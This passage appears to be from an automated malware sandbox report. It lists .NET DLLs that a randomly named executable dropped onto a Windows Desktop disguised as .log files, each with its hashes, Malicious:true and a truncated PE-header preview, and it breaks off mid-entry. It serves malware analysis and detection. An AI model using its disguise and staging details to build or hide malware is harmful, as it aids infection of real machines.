                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\TvubsmQz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\UkEZnNMm.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\UmOidmEa.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\UsorSwnr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\UxTRaQvw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VBwJNHMX.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VDLborKV.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VOpRirdG.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\VZbjtNtA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VlDkhNyc.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VtGsqNSz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\WKjpqzTc.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\WLQZDrsB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\WUhawSrf.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\WgxIpVoy.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\WiesDNNX.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\WlXaMeru.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\WqOKhwod.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\XRIjRSGa.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
